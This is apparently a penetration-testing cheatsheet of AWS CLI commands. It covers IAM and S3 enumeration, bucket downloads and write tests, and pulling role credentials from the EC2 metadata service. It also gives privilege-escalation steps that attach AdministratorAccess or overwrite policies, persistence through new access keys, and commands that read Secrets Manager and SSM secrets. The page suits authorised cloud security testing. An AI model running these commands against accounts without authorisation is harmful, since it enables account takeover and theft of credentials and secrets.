← All Cheatsheets

cloud-pentest

AWS CLI — Cloud Penetration Testing

AWS CLI commands for cloud penetration testing: IAM enumeration, S3 attacks, EC2 SSRF, privilege escalation.

130 views May 2026 lazyhackers

Setup & Enumeration (10)

aws configure

Configure AWS credentials (access key, secret, region)

setup credentials

aws sts get-caller-identity

Identify current AWS identity (who am I)

enum identity sts

aws iam get-user

Get current IAM user details

enum iam user

aws iam list-users

List all IAM users

enum iam users

aws iam list-groups

List all IAM groups

enum iam groups

aws iam list-roles

List all IAM roles

enum iam roles

aws iam list-policies --scope Local

List custom IAM policies

enum iam policies

aws iam list-attached-user-policies --user-name USERNAME

List policies attached to user

enum iam policies

aws iam get-user-policy --user-name USERNAME --policy-name POLICY

Get inline policy for user

enum iam policy

aws iam list-access-keys --user-name USERNAME

List access keys for user

enum iam keys

S3 Attacks (9)

aws s3 ls

List all accessible S3 buckets

s3 enum

aws s3 ls s3://bucket-name

List contents of bucket

s3 enum

aws s3 ls s3://bucket-name --recursive --human-readable

List all files recursively

s3 enum recursive

aws s3 cp s3://bucket-name/file.txt /tmp/

Download file from S3

s3 download

aws s3 sync s3://bucket-name /tmp/bucket/

Sync entire bucket locally

s3 download sync

aws s3api get-bucket-acl --bucket bucket-name

Get bucket ACL (check for public access)

s3 acl enum

aws s3api get-bucket-policy --bucket bucket-name

Get bucket policy

s3 policy

aws s3api list-buckets --query "Buckets[*].Name"

List all bucket names only

s3 list

aws s3api put-object --bucket bucket-name --key test.txt --body /dev/null

Test write access to bucket

s3 write test

EC2 & SSRF/IMDS (6)

curl http://169.254.169.254/latest/meta-data/

Access EC2 IMDS metadata (from within EC2)

imds ssrf ec2

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

List IAM roles attached to EC2

imds iam ssrf

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

Steal temporary credentials from IMDS

imds credentials ssrf

aws ec2 describe-instances --query "Reservations[*].Instances[*].[InstanceId,PublicIpAddress,PrivateIpAddress,State.Name]" --output table

List all EC2 instances with IPs

ec2 enum

aws ec2 describe-security-groups

Enumerate security groups (firewall rules)

ec2 sg enum

aws ec2 describe-snapshots --owner-ids self

List EBS snapshots (look for exposed data)

ec2 snapshots ebs

IAM Privilege Escalation (8)

aws iam attach-user-policy --user-name USERNAME --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Attach AdministratorAccess policy to user

iam privesc admin

aws iam create-policy-version --policy-arn POLICY_ARN --policy-document file://admin_policy.json --set-as-default

Overwrite policy with admin permissions

iam privesc policy

aws iam create-access-key --user-name USERNAME

Create new access key for user

iam persistence key

aws sts assume-role --role-arn arn:aws:iam::ACCOUNT:role/ROLE --role-session-name pentest

Assume an IAM role (lateral movement)

sts assume-role lateral

aws lambda list-functions

List Lambda functions

lambda enum

aws secretsmanager list-secrets

List Secrets Manager secrets

secrets enum

aws secretsmanager get-secret-value --secret-id SECRET_NAME

Read secret value

secrets dump

aws ssm get-parameters --with-decryption --names /path/to/param

Read decrypted SSM parameter

ssm params decrypt